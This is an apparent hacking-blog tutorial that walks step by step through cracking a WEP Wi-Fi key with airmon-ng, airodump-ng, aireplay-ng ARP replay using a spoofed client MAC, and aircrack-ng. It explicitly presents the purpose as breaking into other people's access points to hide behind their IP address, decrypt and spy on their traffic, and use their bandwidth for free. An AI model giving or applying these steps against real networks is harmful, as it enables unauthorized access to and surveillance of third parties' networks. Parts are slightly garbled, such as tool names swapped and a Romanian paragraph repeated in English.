Welcome back, my dear whitehat hackers!
When Wi-Fi was first developed somewhere in the late 1990s, its security was not a major concern. Unlike cable connections, anyone could connect to a Wi-Fi (AP) access point and steal bandwidth.
The first attempt to secure these access points was called Wired Equivalent Privacy or simply WEP. This method of encryption has been used for some time and a number of vulnerabilities have been discovered for it. It has been largely replaced by WPA and WPA2.
Despite these already known weaknesses, there are still a significant number of such APs still in use.
Apparently, a number of home users and small businesses bought APs years ago, didn’t update them and don’t realize it, or simply don’t care about their vulnerabilities.
WEP vulnerabilities make it prone to various hacking techniques. WEP uses RC4 for encryption, and RC4 requires the initialization vectors (IV) to be random. The implementation of RC4 in WEP repeats IVs every 6,000 frames. If we can capture enough IVs, we can decipher the key!
Now, you might be wondering, “Why would I want to hack a Wi-Fi when I have my own router and Wi-Fi access?” I can give you countless answers.
First, if we crack someone else’s Wi-Fi router, we can surf the Internet anonymously or, more precisely, with someone else’s IP address. Second, as soon as we crack the Wi-Fi router, we can decrypt the traffic and use a tool like Wireshark or tcpdump to capture and spy on all traffic. Third, if we use torrents to download large files, we can use their bandwidth rather than our own.
Let’s take a look at WEP hacking with the best wireless hacking tool available, aircrack-ng!
Step 1: Start Aircrack-Ng
Let’s start by opening our favorite Linux distribution, BlackWeb OS and make sure our wireless adapter is recognized and functional.
We notice that our wireless adapter is recognized and renamed wlan0. It can also be wlan1 or wlan2, in other cases.
Step 2: Let’s put the wireless adapter in monitor mode
After that, we need to put the wireless adapter in monitor mode. We can do this by using the following command:
- airmon-ng start wlan0
Note that the interface name has been changed to mon0 by airmon-ng.
Step 3: Capturing the traffic
Now we need to start capturing the traffic. We can do thisby using the airmon-ng command with the monitoring interface, mon0.
- airodump-ng mon0
Step 4: We start a specific capture on the AP
As the screenshot above shows, there are several WEP encrypted APs. Let’s follow the second one from the top with the “click net” ESSID. We copy the BSSID from this AP and start a capture on this AP.
- airodump-ng –bssid A4:99:47:C9:73:A4 -c 11 -w WEPcrack mon0
The above command will start capturing the packets from the “click net” SSID on channel 11 and write them in the WEPcrack file in pcap format. This command will allow us to capture packets to break the WEP key, if we are very patient.
But we are not patient, we want it now! We want to break this key ASAP, and to do that, we’ll need to inject packages into the AP.
Now we have to wait for someone to connect to the AP so that we can get the MAC address on their network card. When we have their MAC address, we can fake their MAC and inject the packets into the AP. As we see at the bottom of the screen, someone has connected to the “click net” AP. Now we can speed up the attack.
Step 5: Injection of ARP traffic
To falsify their MAC and inject the packets, we can use the aireplay-ng command. We need the BSSID of the AP and the MAC address of the client that is connected to the AP. We’ll capture an ARP packet and then play that ARP thousands of times to generate the IVs we need to crack WEP encryption.
- aireplay-ng -3 -b A4:99:47:C9:73:A4 -h 84:4B:F5:87:CD:08 mon0
When we inject ARPs into the AP, we will capture the IVs that are generated in our airodump file, WEPcrack.
Step 6: Cracking the password
As soon as we have several thousand IVs in our WEPcrack file, all we have to do is run this file with aircrack-ng, such as:
- aircrack-ng WEPcrack-01.cap
If we have enough IVs, aircrack-ng will display the key on our screen, usually in hexadecimal format. We simply take that hex key and apply it when we connect to the AP, and we have free wireless internet access!
Stay tuned for more guides on cracking wireless networks
Continuați să reveniți pe Blackweb pentru mai multe tutoriale dedicate spargerii rețelelor Wi-Fi, dar să vedeți și alte metode de hacking. Dacă aveți întrebări cu privire la acest ghid, ne puteți lăsa un mesaj.
Keep reading our site for more tutorials on cracking Wi-Fi networks, but take a look at the other hacking methods. If you have any questions about this guide, you can leave us a message.
Until next time.